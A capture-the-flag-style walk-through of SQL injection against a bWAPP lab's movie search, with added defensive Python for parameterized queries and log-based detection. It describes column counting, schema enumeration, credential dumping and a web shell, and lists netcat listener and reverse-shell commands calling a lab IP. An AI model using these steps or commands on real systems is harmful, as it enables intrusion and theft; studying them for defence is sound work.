Premise

In this walk-through, we demonstrate how to conduct security testing of SQL databases that sit behind search fields. Specifically, we tested a MySQL instance deployed with bWAPP for demonstration purposes.

Skills Learned

  • bWAPP
  • OWASP
  • SQL Injection
  • MySQL

First, I’ll show you how to determine whether a search box is vulnerable to SQL injection. Simply entering a single quote (') into the search field triggers a SQL syntax error. This error message not only confirms the vulnerability but also reveals the type of database in use, which in this case is MariaDB.

Next, I’ll explain the likely structure of the backend SQL query the application is using. Understanding this query is crucial for crafting our attack. The query probably uses the LIKE operator with wildcard characters (%) to search for movies in the database.
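To make the two points above concrete from the defender's side, here is an added example (not code from the post or from bWAPP) that builds the inferred search query both ways: once by splicing the search term into the LIKE pattern, and once with a bound parameter. It uses an in-memory sqlite3 table as a stand-in for the MySQL/MariaDB movie table; the table name, columns and rows are constructed for the example. The single-quote probe from the post is reproduced as a function so you can see that the concatenated query raises a database error while the parameterized one treats the quote as data. It also covers a caveat parameterization alone does not fix: `%` and `_` are still LIKE metacharacters, so the hardened form escapes them and matches the term literally.

```python
import re
import sqlite3


def setup_db() -> sqlite3.Connection:
    # Constructed stand-in for the application's movie table (sqlite3 instead of
    # MySQL/MariaDB; LIKE and % / _ wildcards behave the same way for this purpose).
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE movies (id INTEGER PRIMARY KEY, title TEXT, release_year INTEGER)"
    )
    conn.executemany(
        "INSERT INTO movies (title, release_year) VALUES (?, ?)",
        [("Iron Man", 2008), ("The Matrix", 1999), ("50% Off", 2011), ("Man_Hunt", 2000)],
    )
    return conn


def search_vulnerable(conn: sqlite3.Connection, term: str):
    # The query shape the post infers for the backend: the user's term is spliced
    # straight into the LIKE pattern. A single quote in `term` terminates the string
    # literal early and the database raises a syntax error, which is exactly what the
    # single-quote probe observes on the error page.
    sql = f"SELECT title, release_year FROM movies WHERE title LIKE '%{term}%'"
    return conn.execute(sql).fetchall()


def search_parameterized(conn: sqlite3.Connection, term: str):
    # Hardened form: the whole pattern travels as a bound parameter, so quotes in
    # `term` are data and never part of the SQL text. Because % and _ remain LIKE
    # wildcards even inside a parameter, they are escaped so the term matches literally.
    escaped = re.sub(r"([\\%_])", r"\\\1", term)
    sql = "SELECT title, release_year FROM movies WHERE title LIKE ? ESCAPE '\\'"
    return conn.execute(sql, (f"%{escaped}%",)).fetchall()


def probe_single_quote(search_fn, conn: sqlite3.Connection) -> str:
    # The detection step from the post, as a function: "error" means the probe
    # surfaced a database error (the injectable case), "ok" means it was handled as data.
    try:
        search_fn(conn, "'")
        return "ok"
    except sqlite3.Error:
        return "error"


if __name__ == "__main__":
    db = setup_db()
    print("concatenated query :", probe_single_quote(search_vulnerable, db))
    print("parameterized query:", probe_single_quote(search_parameterized, db))
    print("literal '%' search :", search_parameterized(db, "%"))
```

Running it prints `error` for the concatenated query and `ok` for the parameterized one; the final line shows that a literal `%` only matches the one title that actually contains a percent sign, whereas the concatenated version returns every row for the same input.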

With this knowledge, I’ll demonstrate how to determine the number of columns in the database table. This is a critical step in any SQL injection attack. I’ll use a UNION SELECT statement and incrementally add columns until the error message disappears. In our case, we’ll find that there are seven columns.

Once we know the number of columns, we can start extracting valuable information from the database. I’ll show you how to retrieve the following:

  • Database Name: Using the database() function.
  • Database Version: Using the version() function. This information can be used to find known exploits for that specific version.
  • Table Names: By querying information_schema.tables.
  • Column Names: By querying information_schema.columns for a specific table, such as the “users” table.

After mapping out the database, I’ll show you how to dump user credentials, including usernames and hashed passwords, from the “users” table.
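Each enumeration step above leaves a recognisable trace in the web server's access log. As an added example (not part of the post, and not a bWAPP component), the following scanner parses combined-format access log lines, decodes the query parameters and flags the indicators this walk-through describes: a stray single quote, a UNION SELECT, the database()/version() fingerprint calls, and reads of information_schema.tables or information_schema.columns. The log lines, the client address and the `/search.php?title=` endpoint are constructed for the example and are not the real bWAPP path.

```python
import re
from urllib.parse import parse_qsl, urlsplit

# Indicators taken from the steps described in the walk-through. Each regex is applied
# to a decoded query-parameter value, not to the raw URL, so percent- and plus-encoded
# payloads are caught too.
INDICATORS = {
    "stray_quote": re.compile(r"'"),
    "union_select": re.compile(r"\bunion\b.*\bselect\b", re.I),
    "schema_enum": re.compile(r"information_schema\.(tables|columns)", re.I),
    "fingerprint": re.compile(r"\b(database|version)\(\)", re.I),
}

# Combined-log-format fields we need: client ip, method, request path, status code.
ACCESS_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3})')


def parse_access_line(line: str):
    # Returns (ip, method, path, status) or None for lines that are not access-log
    # records, so malformed input is skipped instead of aborting the scan.
    m = ACCESS_RE.match(line)
    if not m:
        return None
    return m.group(1), m.group(2), m.group(3), int(m.group(4))


def findings_for_request(path: str):
    # Decode every query parameter (parse_qsl undoes %XX and + encoding) and list the
    # indicator names each parameter value triggers, in INDICATORS order.
    hits = []
    for name, value in parse_qsl(urlsplit(path).query, keep_blank_values=True):
        matched = [key for key, rx in INDICATORS.items() if rx.search(value)]
        if matched:
            hits.append((name, matched))
    return hits


def scan_log(lines):
    # One alert per request that trips at least one indicator.
    alerts = []
    for line in lines:
        parsed = parse_access_line(line)
        if parsed is None:
            continue
        ip, _method, path, status = parsed
        hits = findings_for_request(path)
        if hits:
            alerts.append({"ip": ip, "path": path, "status": status, "hits": hits})
    return alerts


# Constructed sample log: a benign search, the single-quote probe, a column-count /
# fingerprint probe and a table-name enumeration, plus one unparsable line.
SAMPLE_LOG = [
    '192.0.2.10 - - [10/Oct/2024:13:55:36 +0000] "GET /search.php?title=iron HTTP/1.1" 200 512',
    '192.0.2.10 - - [10/Oct/2024:13:55:41 +0000] "GET /search.php?title=%27 HTTP/1.1" 200 640',
    '192.0.2.10 - - [10/Oct/2024:13:56:02 +0000] "GET /search.php?title=iron%27+UNION+SELECT+1,database(),version(),4,5,6,7 HTTP/1.1" 200 700',
    '192.0.2.10 - - [10/Oct/2024:13:56:30 +0000] "GET /search.php?title=%27+UNION+SELECT+1,table_name,3,4,5,6,7+FROM+information_schema.tables HTTP/1.1" 200 900',
    "not an access log line",
]


if __name__ == "__main__":
    for alert in scan_log(SAMPLE_LOG):
        print(alert["ip"], alert["status"], alert["hits"])
```

The scanner reports three of the four requests; the benign search produces nothing. In practice the `stray_quote` rule on its own is noisy (titles and names legitimately contain apostrophes), so it is most useful as a correlation signal alongside a spike in HTTP 500 responses or the database error text appearing in application logs, while `union_select` and `schema_enum` are high-confidence on their own.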

Finally, I’ll demonstrate the ultimate goal of our attack: achieving a reverse shell. I’ll inject a PHP code snippet to create a web shell, which will allow us to execute commands on the server. I’ll then set up a Netcat listener on my machine and use the web shell to establish a reverse shell connection, giving me full control over the system.

Technical Commands

Here are all the technical commands that I used in the video:

  • nc -lvp 455
  • whoami
  • netcat 192.168.1.7 4545 -e

Video Walk-through

About the Author

Mastermind Study Notes is a group of talented authors and writers who are experienced and well-versed across different fields. The group is led by Motasem Hamdan, who is a cybersecurity content creator and YouTuber.
